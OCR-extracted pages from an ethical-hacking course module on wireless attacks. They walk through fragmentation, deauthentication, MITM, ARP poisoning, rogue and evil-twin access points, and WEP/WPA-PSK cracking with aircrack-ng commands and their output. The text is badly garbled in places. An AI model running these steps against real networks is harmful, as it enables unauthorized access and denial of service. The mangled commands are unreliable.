Saving chosen packet injreplay src-0124-161120.capC Data packet found? *‫י‬ ‫••••■••••••••••••••••••יי‬ Sending fragmented packet Got RELAYED packet?! PR G A is stored in the file Thats our ARP packet? Trying to get 384 bytes of a keystrean Got RELAYED packet?? Thats our ARP packet? Trying to get 1500 bytes of a keystream Got RELAYED packet?? Thats our ARP packet? Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Use PRGA with packetforge-ng to generate packet(s) to be used for various injection attacks Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction Is Strictly Prohibited.

Fragm entation Attack When fragmentation attack is successful, it can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng, which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack. Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). A larger amount of keying information can be gathered from the replay packet, if the packet is successfully echoed back by the AP. This cycle is repeated several times. Use PRGA with packetforge-ng to generate packet(s) to be used for various injection attacks.

Module 15 Page 2287




C o m m an d P ro m p t C:\>aireplay-ng -5 -b 00:14:6C:7E:40:80-h 00:0F:B5:AB:CB:9Dath0 Waiting for a data packet... Read 96 packets... Size: 120, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = 00:O F :B 5 :A B :CB:9D Source MAC = 00:DO:C F :03:34:8C 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060

0842 0201 OOOf OOdO cf 03 348c 6d6d bleO 92a8 a21d 2a70 49cf 7013 f 7f 3 5953 fd55 66a2 030f 517f 1544 bd82 0505 933f a£2£ Use this packet ? y

b5ab e0d2 039b eef 8 1234 472d ad77 740e

cb9d 4001 ca6f f 9b9 5727 2682 fe9a

0014 0000 cecb 279c 146c 3957 cd99

6c7e 2b62 5364 9020 eeaa 8429 a43c

4080 7a01 6el6 30c4 a594 9ca5 52al

.B___ ..... 1-0. ___ 4. ..e ...+ b z . nun. ... ...o ..Sdn. ..*pi.___ ' 0 . p . ..YS .4 W ' .1 ___ .Uf.. .G - & .9W.).. Qfl .D. ..w .... < R . ...?./t.

FIGURE 15.47: Fragmentation attack screenshot

m

■‫״ ׳ ׳‬

‫״׳‬

g g C o m m an d P ro m p t » m Saving chosen packet in;replay_src-0124-161120.cap. Data packet found! Sending fragmented packet -----------------------Got RELAYED packet!! PRGA is stored in the file Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

FIGURE 15.48: Screenshot showing PRGA location

Module 15 Page 2288




How to Launch MAC Spoofing Attack J

CEH

M A C spoofing attackers change the M A C address to that of an au thenticated to by the M A C filtering configured in an access point

Linux Shell [root@localhost root]# ifconfig wlanO d ow n

..................................

[root@localhost root]# ifconfig wlanO h w e th e r 02:25:ab:4c:2a:bc [rootgaiocalhost root]# ifconfig wlanO up

Show OnlyAdive Netwoik Adaplets

Update MAC

New Spooled MAC Address

I 00 -| 05 -| 56 -

|

5

Active MAC Address |A4-BA-0B-FD-86-63

Restart Adapter

| - 88 | -‫ ־‬55‫ | ־‬j<J

3

1360 SYSTEMS (000556! Spooled MAC Address |Not Spooled

6

J

-*‫־‬

|

MAC List

Refresh

Exit

Netwcxk Connection jLocal Area Connection

Randomly generate any New MAC Address or based on a selected manufacturer

pci\ven_14e4dev_1692$ub$ys_04261028

Copyright © b y

S

IPConfig

Random

SMAC is a MAC address changer for Windows systems

EG-Gtlincil. All


How to Launch a M A C Spoofing Attack

A MAC address is a unique identifier assigned to the network card. Some networks implement MAC address filtering as a security measure. MAC spoofing attackers change the MAC address to that of an authenticated to by the MAC filtering configured in an access point. To spoof a MAC address, the attacker simply need to set the value returned from ifconfig to another hex value in the format of aa:bb:cc:dd:ee:ff. To make the change the sudo command requires the root . SMAC is a MAC address changer for Windows systems. Randomly generate any new MAC address or based on a selected manufacturer. Linux Shell [root@localhost root]# ifconfig wlanO dow n

..................................

[root@localhost root]# ifconfig wlanO hw eth er 02:25:ab:4c:2a:bc [root@localhost root]# ifconfig wlanO up

..................................

FIGURE 15.49: Spoofing MAC address to another new hex value

Module 15 Page 2289



F


Show Only Active Network Adapters

New Spoofed MAC Address

00 - | 05 - | 56 - | 55 - | 88 - | 56| 1360 SYSTEMS [000556]

xj

3

Update MAC

Remove MAC

Restart Adapter

IPConfig

Random

MAC List

Refresh

Exit

Spoofed MAC Address

Network Connection

|Not Spoofed

|Local Area Connection

Active MAC Address (A4-BA-DB-FD-86-63

Hardware ID |pci\ven_14e4dev_1692subsys_04261028

FIGURE 15.50: Screenshot showing the new spoofed MAC address

Module 15 Page 2290




D en ia l of Service: Deauthentication and Disassociation Attacks

Client is authenticated and associated w ith AP

Client connects to netw ork Client is still authenticated but

Client attempting

no longer associated w ith the AP

Attacker

Access Point (AP)

to connect

D is a s s o c ia t io n A tt a c k D cauth com m and: a i r e p l a y - n g — d e a u t h 2 5 - h
Client is authenticated and associated w ith AP

Client is no longer authenticated or

—

<................ -

associated w ith the AP

^ 22Z1Z'. I : : : :

Access Point (AP)

Client fully connected

Attacker sends a

Deauthenticate Request packet

Attacker

to take a single client offline

D e a u t h e n t ic a t io n A tta c k s

D enial of Service: Deauthentication and # Disassociation Attacks Wireless networks are susceptible to denial-of-service attacks. Usually these networks operate in unlicensed bands and the transmission of data takes the form of radio signals. The designers of the MAC protocol aimed at keeping it simple, but it has its own set of flaws that are more attractive to DoS attacks. The possibility of DoS attacks on wireless networks is greater due to the relationship of the physical, data-link, and network layers. The DoS attacks on wireless networks can be performed using the two techniques: disassociation attacks and deauthentication attacks. In a disassociation attack, the attacker makes the victim unavailable to other wireless devices by destroying the connectivity between station and client. C lient is a u th e n tica te d and asso ciated w ith A P

l

‫ג‬ C lient con n ects to n e tw o rk

'M Client attempting

'Vs/ Client is still au th en ticated but no longer associated w ith the A P

Access Point (AP)

to connect

D isa sso cia tio n A tta ck

FIGURE 15.51: Diagrammatical representation of Disassociation Attack

Module 15 Page 2291




In a deauthentication attack, the attacker floods station(s) with forged deauthenticates or disassociates to disconnect s from an AP.

Attacker




Man-in-the‫־‬Middle Attack

CEH

Victim is deauthenticated and starts to search all channels for a new valid AP

Attacker sniffs the victim's wireless parameters (the MAC address, ESSID/BSSID, number of channels)

©

r % ^

© u

Oeauthenticated

£ ± < ... * a

Attacker sets a forged AP on a new channel with the original MAC address (BSSID) and ESSIO of the victim's AP

©

r-

Victim Connects Connects*♦. to Forged AP *

*

j

After the victim's successful association to the forged AP, the attacker spoofs victim to connect to the original AP

©

r■

Attacker sits in between the access point and the victim and listens all the traffic

c

©

‫י*־‬8 ‫א‬ .3 Copyright © b y

EG-G*ancil. All


▼ ▼ A man-in-the-middle attack is an active Internet attack where the attacker attempts to intercept, read, or alter information between two computers. MITM attacks are associated with a 802.11 WLAN, as well as with wired communication systems. E a v e s d r o p p in g

*

Eavesdropping is easy in a wireless network because there is no physical medium used to communicate. An attacker who is in an area near the wireless network can receive radio waves on the wireless network without much effort or many gadgets. The entire data frame sent across the network can be examined in real time or stored for later assessment. In order to prevent whackers from getting sensitive information, several layers of encryption should be implemented. WEP, data-link encryption, was developed for this purpose. If a security mechanism such as IPSec, SSH, or SSL is not used for transmission, the sent data is available to anyone, and is vulnerable to attack by whackers with an antenna. However, W EP can ked with tools freely available on the net. Accessing email using the POP or IMAP protocols is risky because these protocols can send email over a wireless network without any form of extra encryption. A determined whacker can potentially log gigabytes of WEP-protected traffic in an effort to post-process the data and break the protection.

Module 15 Page 2293




M a n ip u la t io n ^ Manipulation is the next level up from eavesdropping. Manipulation occurs on a 1 1 wireless link when an attacker is able to receive the victim's encrypted data, manipulate it, and retransmit the changed data to the victim. In addition, an attacker can intercept packets with encrypted data and change the destination address in order to forward these packets across the Internet. The figure that follows shows a step-by-step explanation of a man-in-the-middle attack:

Sends a DEAUTH request to the victim with the spoofed source address of the victim's AP

Attacker sniffs the victim's wireless parameters (the MAC address, ESSID/BSSID, number of channels)

c

Victim is deauthenticated and starts to search all channels for a new valid AP

© *

9

:

® D e au th en ticated

S

*3 Attacker sets a forged AP on a new channel with the original MAC address (BSSID) and

I I I

<............ » % 3

After the victim's successful association to the forged AP, the attacker spoofs victim to connect to the original AP

<....

,3

Attacker sits in between the access point and the victim and listens all the traffic

0

(6 )

‫־ז‬:

£

3

;3

FIGURE 15.53: Steps explaining man-in-the-middle attack

Module 15 Page 2294




MITM Attack Using Aircrack-ng

C EH Urt1fw4

ilhiul lUthM

Command Prompt C:\>airmon‫־‬ng start ethl

^ ‫ייי‬

BSSID 02:24:2B:CD:68:EF

PW R

R XQ

99 99

55

02:24:2B:CD:68:EE

99

9

00:14:6C:95:6C:FC

99

0

1E:64:51:3B:FF:3E

76

70

Step 1: Run

‫■■■■■ י‬

C:\>airodump‫־‬ng -ivs --write capture e th l Beacons

#Data, #/s

60

airmon-ng in

■■■■■■■■■‫י‬

3

CH

MB

ENC

0

1

54e

OPN

0

5

54e

OPN

0

9

54e

1

0

‫יי‬ CIPHER

AUTH

■■■

monitor mode

ESSID 1AM ROGER

Step 2: Start airodump to

CO M PANYZON E

W EP

11

‫•י‬

W EP

54e

HO M E

W EP

W EP

discover SSIDs on

SECRET SSID

interface BSSID

Station

1E:64:51:3B:FF:3E

00:17:9A:C3:CF:C2

PW R

1E:64:51:3B:FF:3E

00:1F:5B:BA:A7:CD

R ate

Lost

Packets

Probes

10 1 - 0 1‫־‬ 76

le-S4

0

6

□

Command Prompt

Step 3: Deauthenticate (deauth) the client

C:\>aireplay-ng -deauth 5 -a 02:24:2B:CD:68:EE

using Aireplay-ng

Command Prompt

‫ם‬

C:\>aireplay-ng -10 -e SECRET_SSID -a le:64:51:3b:ff:3e -h 02:24:2B:CD:68:EE e th l

<■

Step 4: Associate your wireless card (fake association)

22:25:10 W a itin g for beacon fram e (BSSID : 1E:64:51:3B:FF:3E) on channel 11

with the A P you

22:25:10 Sending Authentication Request 22:25:10 A uthentication successful

are accessing with

22:25:10 Sending Association Request

aireplay-ng

22:25:10 Association su ccessfu l:-)

Copyright © by EG-CtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited.

M IT M Attack Using Aircrack-ng 7 ‫ ־‬Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP,

and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks. It can be used to perform man-in-the-middle attacks on wireless networks. To perform the MITM attack on WLANs using Aircrack-ng the of the tool should follow these steps: Step 1: Run airmon-ng in monitor mode Step 2: Start airodump to discover SSIDs on interface

C:\>airmon-ng start ethl C:\>airodump-ng -ivs -write capture ethl

■

PW R

R XQ

#Data,

#/s

CH

MB

ENC

02:24:2B:CD:68:EF

99

5

60

3

0

1

54e

OPN

IA M R O G ER

02:24:2B:CD:68:EE

99

9

75

2

0

5

546

OPN

CO M PA N Y ZO N E

00:14:6C:95:6C:FC

99

0

15

1E:64:51:3B:FF:3E

76

70

157

BSSID

Beacons

0

0

9 1

54e 0

CIPHER

W EP

11

BSSID

Station

PW R

Rate

Lost

1E:64:51:3B:FF:3E

00:17:9A:C3:CF:C2

-1

1 -0

0

Packets 1

1E:64:51:3B:FF:3E

00:1F:5B:BA:A7:CD

76

le-54

0

6

54e

AUTH

W EP W EP

ESSID L ■

HOME W EP

SECRET SSID

Probes

■

F IG U R E 15.54: Discovering SSIDs using

Module 15 Page 2295




Step 3: De-authenticate (deauth) the client using Aireplay-ng

FIGURE 15.55: Aireplay-ng de-authenticating the client

Step 4: Associate your wireless card (fake association) with the AP you are accessing with aireplay-ng

‫ם‬

Command Prompt C:\>aireplay-ng -1 0 e SECRET_SSID a le:64:51:3b:ff:3e h 02:24:2B:CD:68:EE e th l 22:25:10 W aitin g for beacon fram e (BS5ID : 1 E:6 4 :51 :3 B:FF3 E) on channel 11 22:25:10Sending Authentication Request 22:25:10 A uthentication successful 22:25:10 Sending Association Request 22:25:10Association successful :-)

FIGURE 15.56: Associating wireless card

Module 15 Page 2296




W ireless ARP Poisoning Attack

CEH Urt1fW4

A P I sends updated MAC address info to the network routers and switches, which in turn update their routing and switching tables

ttfciul lUilwt

Traffic now destined from the network backbone to Juggyboy's system is no longer sent to AP2

Access Point2

Access Pointl

Attacker spoofs the MAC address of Jessica's Wireless Laptop and attempts to authenticate to A PI

MAC Address 04 A4 52-33-61

Normal flow of wireless traffic

Attacker uses A R P Poisoning tool such as Cain & Abel

a

MAC Address 00 45-B8-74-03

Jessica's Wireless Laptop

Attacker's System

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless ARP Poisoning Attack ARP is used to determine the MAC address of an access point whose IP address is known. Usually the ARP doesn't possess any verification feature that can tell that the responses are from valid hosts or it is receiving a forged response. ARP poisoning is an attack technique that exploits the lack of verification. In this technique the ARP cache maintained by the OS with wrong MAC addresses are corrupted. This can be achieved by sending an ARP Replay pack constructed with a wrong MAC address. The ARP poison attack has its impact on all the hosts present in a subnet. All stations associated with a subnet affected to ARP poison attack are vulnerable as most of the APs act as transparent MAC layer bridges. All the hosts connected to a switch or hub are susceptible to ARP poisoning attacks if the access point is connected directly to that switch or hub without any router/firewall in between them. The following diagram illustrates the ARP poisoning attack process:

Module 15 Page 2297




A P I sends updated M A C address info to the network routers and switches, which in turn update their routing and switching tables

Traffic now destined from the netw ork backbone to Juggyboy's system is no longer sent to AP2

Access Point2

A Attacker spoofs the

&

M A C address of

Normal flo w of

Juggyboy's wireless

wireless traffic

laptop and attem pts

/

to authenticate to A P I

M AC Address

M A C Address 04-A4-52-33-61

Attacker uses ARP Poisoning

00-45-B8-74-03

tool such as Cain & Abel Juggyboy’s Wireless Laptop

Attacker's System FIGURE 15.57: Wireless ARP Poisoning Attack process

In this wireless ARP spoofing attack, the attacker first spoofs the MAC address of Juggyboy's wireless laptop and attempts to authenticate to A PI. A P I sends the updated MAC address information to the network routers and switches, which in turn update their routing and switching tables. Traffic now destined from the network backbone to Juggyboy's system is no longer sent to AP2 instead it is sent to API.

Module 15 Page 2298




R ogue A c c e ss Point Compact, pocketsized rogue AP device plugged into an Ethernet port of corporate network

Choose an appropriate location to plug in your rogue access point that allows maximum coverage from your connection point

Rogue access point device connected to corporate networks over a Wi-Fi link

Disable the SSID Broadcast (silent mode) and any management features to avoid detection

Place the access point behind a firewall, if possible, to avoid network

Software-based rogue access point running on a corporate Windows machine

Deploy a rogue access point for short period

Copyright © b y

EG-Gtlincil. All

USB-based rogue access point device plugged into a corporate machine


Rogue Access Point

*

Rogue access points (APs) are the wireless access points that are installed on a network without authorization and are not under the management of the network . These rogue access points lack the security controls provided for the authorized APs of a network, thus providing backdoor access to the network for anyone connecting to the rogue AP. To gain backdoor access to a network through a rogue AP, the attacker should follow these steps: 9

Choose an appropriate location to plug in your rogue access point that allows maximum coverage from your connection point

9

Disable the SSID Broadcast (silent mode) and any management features to avoid detection

9

Place the access point behind a firewall, if possible, to avoid network scanners

9

Deploy a rogue access point for shorter periods

Interesting scenarios for rogue AP installation/setup: 9

Compact, pocket-sized rogue AP device plugged into an Ethernet port of corporate network: compact, pocket-sized rogue APs are easily available on the market. These of their compact size. They can be brought into a particular location without any efforts

Module 15 Page 2299




and can be hidden easily. Also, these APs require very low power; therefore, they can be powered even from a battery for long durations. 6

Rogue AP device connected to corporate networks over a Wi-Fi link: The rogue AP device can also be connected to a network over a Wi-Fi link. This is possible when the target network also has Wi-Fi coverage. As the AP device connects wirelessly to the authorized network, hiding this rogue AP device is easy. This eliminates the need of unused Ethernet port of the target network, but installing the rogue AP device wirelessly requires the credentials of the target network. The attacker should use the Wi-Fi Ethernet Bridge in conjunction with a regular AP device in order to connect to the target network.

9

USB-based rogue AP device plugged into a corporate machine: A USB-based rogue AP device is generally plugged in to a windows machine with access to the target network either though wired or wireless means. The machine's network access can be shared with a rogue device using the USB AP's software. This eliminates the need of unused Ethernet port and the credentials of the target Wi-Fi in order to set up a rogue AP.

9

Software-based rogue AP running on a corporate Windows machine: In this scenario, no separate physical AP device is needed as the rogue AP are set up in the software itself on the embedded/plugged Wi-Fi adapter of the target network. This is possible through the virtual Wi-Fi capability of the latest Windows operating system, Windows 7. This makes the rogue AP even stealthier.

Module 15 Page 2300




Evil Twin Authorized Wi-Fi

CEH

Evil Twin is a wireless A P that pretends to be a legitimate AP by

Evil Twin

replicating another network name

Attacker sets up a rogue A P outside the corporate perimeter and lures to sign into the wrong AP

Once associated, s may by the enterprise security policies giving attackers access to network data

Evil Twin can be configured with a common residential SSID, hotspot SSID or SSID of a company's WLAN

Wi-Fi is everywhere these days and so are your employees. They take their laptops to Starbucks, to FedEx Office, and to the airport. How do you keep the company data safe? Copyright © b y

EG-Gtlincil. All


Evil Tw in

o

Evil Twin is a wireless AP that pretends to be a legitimate AP by imitating another network name. It poses a clear and present danger to wireless s on private and public WLANs. Attacker sets up a rogue AP outside the corporate perimeter and lures to sign into the wrong AP. Attackers can use attacking tools such as KARMA that monitors station probes to create an evil twin. It can adopt any commonly-used SSIDs as its own SSID in order to lure the s. Or Evil Twin can be configured with a common residential SSID, hotspot SSID or SSID of a company's WLAN. As long as legitimate s can be monitored with various tools even APs that do not send SSIDs in probe requests can be targeted. WLAN stations usually connect to specific APs based on its SSIDs and the signal strength and also the stations automatically reconnect to any SSID that has been used in the past. These issues allows the attackers to trick the legitimate s easily just by placing an Evil Twin near the target network. Once associated, s may by the enterprise security policies giving attackers access to network data.

Module 15 Page 2301




SSID: STARBUCKS

FIGURE 15.58: Evil twin

Module 15 Page 2302




How to Set Up a Fake Hotspot (Evil Twin)


How to Set Up a Fake Hotspot (Evil Twin) Hotspots available in the region may not always be a legitimate AP. There may be a possibility of evil twin mounted by the attacker that pretends to be a legitimate hotspot. It is difficult to differentiate between a legitimate hotspot and an evil twin as the evil twin pretends to be the legitimate one. For instance, a tries to and finds two access points. One is legitimate, while the other is an identical fake (evil twin). The victim picks one; if it's the fake, the attacker gets information and access to the computer. In the meantime, the goes nowhere. He or she probably thinks it was just a attempt that randomly failed. Following are the steps that illustrate the process of setting up or mounting a fake hotspot (Evil Twin): Q You will need a laptop with Internet connectivity (3G or wired connection) and a mini access point Q

Enable Internet Connection Sharing in Windows 7 or Internet Sharing in Mac OS X

9

Broadcast your Wi-Fi connection and run a sniffer program to capture s

Module 15 Page 2303




A Victim

V

Victim Broadcast SSID:Starbucks

i

a

O

3G or Ethernet Connection to the Internet

Attacker Computer set as AP, Running a Sniffer

Internet FIGURE 15.59: Setting up a fake hotspot

non

Sharing

4 [ ►

Show All

Comj

Network Name: Channel:

Juggyboy Automatic

t...

13

Enable encryption (using WEP)

On

:

Sei

□ DV □

SCI

□

Fih

Confirm : W EP Key Length:

□ w □

SCI

□ w( □

128-bit

If you plan to shar• computers, use a S and a 13 character

Internet Sharing: Off

Internet Sharing allows other computers to share your connection to the Internet. Share your connection from:

Ethernet

Re

□

Re

□

Remote Appte Events

0

X gr i d Shar i ng

^

Internet Sharing

0

Bl ue t oot h Shar i ng

On

Q o

Tl

Ports Ethernet AirPort FireWire

Cl i ck t he l ock t o p r e ve nt f u r t h e r c hange s .

FIGURE 15.60: Capturing s

Module 15 Page 2304





c EH

tertMM

ttkM4l lUibM

W ire le ss T ra ffic A n a lys is

GPS M apping


C ra c k W i-Fi E n c ry p tio n

L au n ch W ire le ss A tta c k s

Copyright © b y IG -G O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Hacking Methodology Wireless network, then you should determine the encryption used by the WLAN and then crack the encryption.

Module 15 Page 2305




How to Crack WEP Using Aircrack

CEH

(«rt1fw4

tlfcxjl HMbM

M o n ito r w ireless traffic W ith a ir m o n - n g

C :\>airmon-ng start ethl

Collect w ireless traffic data w ith a ir o d u m p - n g

C :\>airodump-ng --ivs --write capture ethl

Associate you r w ireless card w ith the A P you are accessing w ith aireplay-ng

C :\>aireplay-ng -1 0 -e SECRET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 ethl

Start packet injection w ith aireplay-ng

C:\>aireplay-ng -3 -b le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 ethl

D ecrypt the W E P Key w ith aircrack-ng

C :\>aircrack-ng -s capture.ivs


1/‫ *־‬How to Crack WEP Using A ircrack WEP is a broken security algorithm for 802.11 wireless networks. It is intended to provide the data confidentiality in wireless networks. Attackers want to break this encryption key to break into the wireless networks. This WEP has vulnerabilities that can be exploited easily and thus, the W EP key can be cracked. The following steps explain the process of cracking WEP using the Aircrack tool. STEP 1: Monitor wireless traffic with airmon-ng C : \>airmon-ng s t a r t e th l STEP 2: Collect wireless traffic data with airodump-ng C : \>airodump-ng --ivs --w rite capture e th l STEP 3: Associate your wireless card with the AP you are accessing with aireplay-ng C :\>aireplay-ng 0 1‫־‬ a 7 :71:f e :8 e :d 8 :25 ethl

-e

SECRET_SSID

-a

l e :64:51:3 b :f f :3e

-h

STEP 4: Start packet injection with aireplay-ng C :\>aireplay-ng -3 -b l e :64:51:3 b :f f :3e -h a 7 :71:f e :8 e :d 8 :25 ethl

STEP 5: Decrypt the WEP Key with aircrack-ng C : \>aircrack-ng -s ca p tu re . iv s

Module 15 Page 2306




H ow to C rac k W EP U sing A irc ra c k Screenshot 1/2

EH

Command Prompt 1

V . ..........

.L . c:\>a1rm on-ng start: e i n i

m ₪ ₪ ₪ ₪ ₪ m ‫גי‬

■■■■■■■■ I■■■■

...........

C:\>airodum p-ng —iv s --w rite c a p tu r e e t h l

........ . . . .

<

ng in monitor mode

PW R

RXQ

CH

MB

ENC

02:24:2B:CD:68:EF

99

5

60

3

0

1

54e

OPN

IAM ROGER

02:24:2B:CD:68:EE

99

9

75

2

0

5

54e

OPN

COMPANYZONE ■

00:14:6C:95:6C:FC

99

0

15

0

0

9

54e

W EP

W EP

HOM E

1E:64:51:3B:FF:3E

76

70

157

1

0

11

54e

W EP

W EP

SECRET_SSID

BSSID

Station

1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E

BSSID

Beacons

*Data, #/s

S te p 1: Run airmon•

......... CIPHER

AUTH

ESSID

■ S te p 2: Start

"‫־‬

airodump to discover SSIDs on interface and keep it running. Your capture file

PW R

Rate

Lost

Packets

00:17:9A:C3:CF:C2

-1

1- 0

0

1

00:1F:5B:BA:A7:CD

76

le-54

0

6

should contain

Probes

more than 50,000 IVs to successfully

‫•׳י‬

5*S Command Prompt

crack the W E P key.

_ §

C:\>aireplay-ng -1 0 -e SEC R ET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 e t h l

< .................

Step 3: Associate your wireless card

22:25:10 Waiting for beacon frame (BSSltf:15:64:51:3B:FF:3E) o n W y in e l 11

with target access point

Target M A C address

22:25:10 Sending Authentication Request 22:25:10 Authentication successful 22:25:10 Sending Association Request 22:25:10 Association successful:-)


How to Crack WEP Using A ircrack Screenshot 1/2 Aircrack is a tool that can be used for cracking W EP encryption, which provides the data confidentiality for wireless networks. The following are screenshots of the W EP cracking process using the Aircrack tool. Step 1: Run airmon-ng in monitor mode. Step 2: Start airodump to discover SSIDs on interface and keep it running. Your capture file should contain more than 50,000 IVs to successfully crack the WEP key. r7 Command Prompt

□1 A.

c:\>airm0 n-ng start e t h l

■

C:\>airodump-ng --ivs --w rite capture e t h l BSSID 02:24:2B:CD:68:EF

PWR

RXQ

99

5

CH

MB

ENC

60

3

0

1

54e

OPN

Beacons

#Data, #/s

CIPHER

AUTH

ESSID

02:24:2B:CD:68:EE

99

9

75

2

0

5

54e

OPN

00:14:6C:95:6C:FC

99

0

15

0

0

9

54e

WEP

WEP

HOME

1E:64:51:3B:FF:3E

76

70

157

1

0

11

54e

WEP

WEP

SECRETSSID

BSSID

Station

PWR

Rate

Lost

1E:64:51:3B:FF:3E

00:17:9A:C3:CF:C2

-1

1-0

0

Packets 1

1E:64:51:3B:FF:3E

00:1F:5B:BA:A7:CD

76

le-54

0

6

_

IAMROGER COMPANYZONE

■

Probes

FIGURE 15.61: Discovering SSIDs using airodump

Module 15 Page 2307




Step 3: Associate your wireless card with the target access point, a

Command Prompt

□

C:\>aireplay-ng -1 0 -e SECRET_SSID -a le:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 e th l 22:25:10 Waiting for beacon frame (BSSIl3!iJE:64:51:3B:FF:3E)on^F!aj1neI 11 22:25:10 Sending Authentication Request

Target SSID

Target MAC address

22:25:10 Authentication successful 22:25:10 Sending Association Request 22:25:10 Association successful:-)

FIGURE 15.61: Screenshot showing target SSID and MAC address

Module 15 Page 2308




How to Crack WEP Using Aircrack Screenshot 2/2 r—a? jjjj

EH

□

Command Prompt

C:\>aireplay-ng -3 -b l e: 64: 51: 3b :f f: 3e -h a7:71:fe:8e:d8:25 e t h l

<

S te p 4: Inject

■

packets using

22:30:15 W aiting for beacon fram e (BSSID: 1E:64:51:3B:FF:3E)

aireplay-ng to generate traffic

Saving A RP requests in replay_arp-0219-123051.cap

on target access

You should also start airodump-ng to capture replies

point

Read 11978 packets (got 7193 A RP requests), sent 3902 packets...

□j

P&t Command Prompt C:\>aircrack-ng -s capture.ivs

^

................................................... .................

S te p 5: W a it for airodump-ng to

Opening capture.ivs

capture more

Read 75168 packets.

than 50,000 IVs

Aircrack-ng 0.7 rl3 0

Crack W E P key

[00:00:10] Tested 77 keys (got 684002 IVs)

using aircrack-ng.

KB depth byte(vote) 0 0 /1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0) 1 0 / 3 66( 41) F I( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9) 2 0 /2 5C( 89) 52( 60) E3( 22) 10( 20) F3( 18) 8B( 15) 8E( 15) 14( 13) D2( 11) 47( 10) 3 0 /1 FD( 375) 81( 40) ID ( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17) KEY FOUND! [ AE:66:5C:FD:24 ]


How to Crack WEP Using A ircrack Screenshot 2/2 Step 4: Inject the packet using aireplay-ng to generate traffic on the target access point.

‫ם‬

ijgg Command Prompt C:\>aireplay-ng -3 -b le:6 4 :5 1 :3 b :ff:3 e -h a7:71:fe:8e:d8:25 e t h l 22:30:15 Waiting for beacon frame (BSSID: 1E:64:51:3B:FF:3E)

Saving ARP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

FIGURE 15.62: Generating traffic on the target access point using aireplay-ng

Step 5: Wait for airodump-ng to capture more than 50,000 IVs Crack WEP key using aircrack-ng.

Module 15 Page 2309




Command Prompt C:\>aircrack-ng -s cap ture.ivs Opening capture.ivs Read 75168 packets. Aircrack-ng 0.7 rl30 [00:00:10] Tested 77 keys (got 684002 IVs) KB depth byte(vote) 0 0/1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0) 10/3 66( 41) F I( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9) 2 0/2 5C( 89) 52( 60) E3{ 22) 10( 20) F3( 18) 8 B( 15) 8 E{ 15) 14( 13) D2( 11) 47( 10) 3 0/1 FD( 375) 81( 40) ID ( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) OB( 17) 35( 17) KEY FOUND! [ AE:66:5C:FD:24 ]

FIGURE 15.63: Capturing 50,000 IVs Crack WEP key using aircrack-ng

Module 15 Page 2310




How to Crack WPA-PSK Using Aircrack S te p 1

S te p 2

I

Collect wireless traffic data with airodump-ng

Monitor wireless traffic with airmon-ng

C :\>airodump-ng ethlr

C :\>airmon-ng start ethl

--write capture

02S Command Prompt C:\>airmon‫־‬ng start ethl C:\>airodump-ng BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E

-write capture ethl PWR RXQ Beacons #Data, #/s 99 5 60 3 0 99 9 75 2 0 99 0 15 0 0 157 1 0 76 70

BSSID Station PWR 1E:64:51:3B:FF:3E 00:17:9A:C3:CF:C2 -1 1E:64:51:3B:FF:3E 00:1F:5B:BA:A7:CD 76

CH 1 5 9 11

MB 54e 54e 54e 54e

ENC CIPHER AUTH ESSID OPN IAMROGER WPA TKIP PSK COMPANYZONE WEP WEP HOME WEP WEP SECRET_SSID

Rate Lost Packets Probes 1-0 0 1 le-54 0 6

— Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

How to Crack WPA-PSK Using Aircrack WPA-PSK is an authentication mechanism in which s provide some form of credentials for authentication of a network. Encryption mechanisms used for WPA and WPAPSK are same, but the only difference between these two is authentication is reduced to a simple common in WPA-PSK. The preshared key (PSK) mode of WPA is considered vulnerable to the same risks as any other share system. This WPA-PSK can be cracked using the Aircrack tool. The following are the steps to crack WPA with Aircrack: Step 1: Monitor wireless traffic with airmon-ng C : \>airmon-ng s t a r t e th l Step 2: Collect wireless traffic data with airodump-ng C : \>airodump-ng --w rite capture e t h lr

Module 15 Page 2311




Command Prom pt C:\>airmon-ng

□

start ethl

■

c:\>airodump-ng -write capture ethl PW R

RXQ

CH

MB

ENC

02:24:2B:CD:68:EF

BSSID

99

5

Beacons 60

#Data, #/s 3

0

1

54e

OPN

02:24:2B:CD:68:EE

99

9

75

2

0

5

54e

WPA

TKIP

00:14:6C:95:6C:FC

99

0

15

0

0

9

54e

W EP

